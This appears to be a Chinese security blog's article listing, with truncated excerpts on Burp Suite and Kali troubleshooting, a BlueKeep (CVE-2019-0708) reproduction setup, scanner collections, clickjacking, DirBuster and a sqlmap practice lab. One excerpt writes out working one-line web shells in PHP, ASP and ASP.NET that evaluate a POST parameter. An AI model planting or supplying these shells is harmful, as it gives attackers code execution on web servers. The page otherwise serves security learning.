渗透测试
关注
分享
扫一扫
mad-coding
If you want to succeed,just do it!
展开
-
解决burpsuite总是抓到火狐的包
问题:在渗透测试的过程中使用火狐浏览器,但是burpsuite总是抓到火狐的无用数据包,这就很烦人了,如下图解决方法:在网上搜索了一些网友的方法,可用方法如下:1.在firefox(火狐浏览器)地址栏中输入:about:config2.然后出现搜索框,搜索以下内容,双击将它设置成false。network.captive-portal-service然后抓包...原创 2020-03-06 14:42:21 · 7242 阅读 · 0 评论 -
burpsuite代理问题
0x00 前言一日,在正常的工作的时候,burpsuite莫名的出现了代理抓包出现了异常,对某个特定的网站开了代理就访问不了,也抓不到包。0x01 问题描述burpsuite开了代理后,proxy放行状态,但是访问某个特定的网站提示这个错误。0x02 解决方法根据错误的提示,是请求被burp的代理插件给drop掉了。但是我burp开了好多的插件,咋知道是哪个插件干的事。...原创 2019-12-16 10:26:14 · 1012 阅读 · 0 评论 -
Kali Linux 2019.4解决中文乱码问题
0x00 前言Kali Linux不用多说,知道的人都知道,国外的一个渗透测试系统,集成了很多的渗透工具,最近跟新了2019.4但是很多小伙伴安装后显示有中文乱码问题,这里教大家如何解决。0x01 更换Kali 清华大学源使用vim编辑器修改:vim /etc/apt/sources.list添加Kali 清华大学源使用mousepad编辑器修改:mousepad /etc/apt/sou...原创 2019-12-03 17:00:49 · 26791 阅读 · 3 评论 -
CVE-2019-0708复现教程
0x00 前言前几天,随着CVE-2019-0708漏洞EXP的现世,顿时让安全圈躁动起来,大家都通过官网的一些文档教程来自己搭建环境复现漏洞,而菜鸡的我,复现了好久,却久久不能复现成功,今天再次复现,发现了问题的所在,再次献上自己的复现教程,虽然网上教程已经泛滥。0x01 测试环境攻击机:kali Linux 2019.2靶机:Windows7 ultimate SP1Windows...原创 2019-09-11 20:44:10 · 2038 阅读 · 2 评论 -
2019安全渗透类工具
0x00 前言 集合github平台上的安全行业从业者自研开源扫描器的仓库,包括子域名枚举, 数据库漏洞扫描, 弱口令或信息泄漏扫描, 端口扫描, 指纹识别 其他大型扫描器或模块化扫描器。项目地址:https://github.com/We5ter/Scanners-Box0x11 收集目的本仓库收集的初衷是为向各类企业安全从业人员提供在企业信息安全防护体系建设过程...原创 2019-07-01 00:15:59 · 7760 阅读 · 0 评论 -
网络术语,接口和协议简介
0x00 介绍对管理服务器的任何人来说,对网络的基本了解都很重要。它不仅对于使您的服务在线并顺利运行至关重要,而且还为您提供诊断问题的洞察力。本文档将提供一些常见网络概念的基本概述。我们将讨论基本术语,通用协议以及不同网络层的职责和特征。本指南与操作系统无关,但在实现利用服务器上的网络的功能和服务时应该非常有用。0x01 网络术语表在我们开始讨论任何深度的网络之前,我们必须定义...翻译 2019-07-04 14:59:51 · 6186 阅读 · 0 评论 -
安全行业从业人员自研开源扫描器合集
项目介绍Scanners-Box是来自github平台的开源扫描仪的集合,包括子域枚举,数据库漏洞扫描程序,弱密码或信息泄漏扫描仪,端口扫描仪,指纹扫描仪和其他大型扫描仪,模块化扫描仪等。对于其他众所周知的扫描工具,如:Nmap,w3af,brakeman将不会包含在收集范围内。安全行业从业人员常用工具指引,包括各类在线安全学习资料和安全检测工具,欢迎大家持续贡献!入门指南http...转载 2019-06-14 15:48:00 · 1091 阅读 · 0 评论 -
点击劫持(ClickJacking)
点击劫持(ClickJacking)是一种视觉上的欺骗手段。大概有两种方式,一是攻击者使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在该页面上进行操作,此时用户将在不知情的情况下点击透明的iframe页面;二是攻击者使用一张图片覆盖在网页,遮挡网页原有位置的含义;iframe覆盖直接示例说明1. 假如我们在百度有个贴吧,想偷偷让别人关注它。于是我们准备一个页面:&...转载 2019-05-19 12:43:06 · 1077 阅读 · 2 评论 -
burp加载jython时出错
问题描述:具体环境配置如下,路径都是正确的勾选插件时出现下面的情况问题原因:jar包出现了问题,重新下载jar包完美解决问题加载出错的jar包官网下载的jar包可以从文件的大小中就可以看出来jar包有问题。解决步骤:第一步:去官网重新下载jython 的jar包文件https://www.jython.org/do...原创 2019-04-28 18:06:29 · 5568 阅读 · 1 评论 -
Web安全工程师学习路线
文章转载至: https://www.sec-wiki.com/skill/2转载 2019-03-29 11:21:47 · 1482 阅读 · 0 评论 -
DirBuster目录爆破工具的使用
原创 2019-03-22 16:30:06 · 4148 阅读 · 0 评论 -
上传一句话木马拿shell教程
0x00 前言一句话木马:<?php @eval($_POST['pass']);?>ASP: <%eval request("pass")%>ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>原理:php的...原创 2019-03-21 17:42:49 · 12189 阅读 · 3 评论 -
在虚拟机中搭建本地的sqlmap靶场
引言: 很多喜欢渗透测试的朋友在练习sqlmap时没有环境来训练,所以笔者在这里教大家自己来搭建一个本地的训练靶场进行练习,在书写的过程中可能会有不足和错误之处,还请大家不要见怪,并加以指出,相互学习,共同进步。0x01 在虚拟机中安装Windows7系统虚拟机安装操作系统的步骤可以百度 安装vmtool0x02 配置WAMP环境1.使用phpstudy一键配...原创 2019-02-18 22:15:58 · 3858 阅读 · 0 评论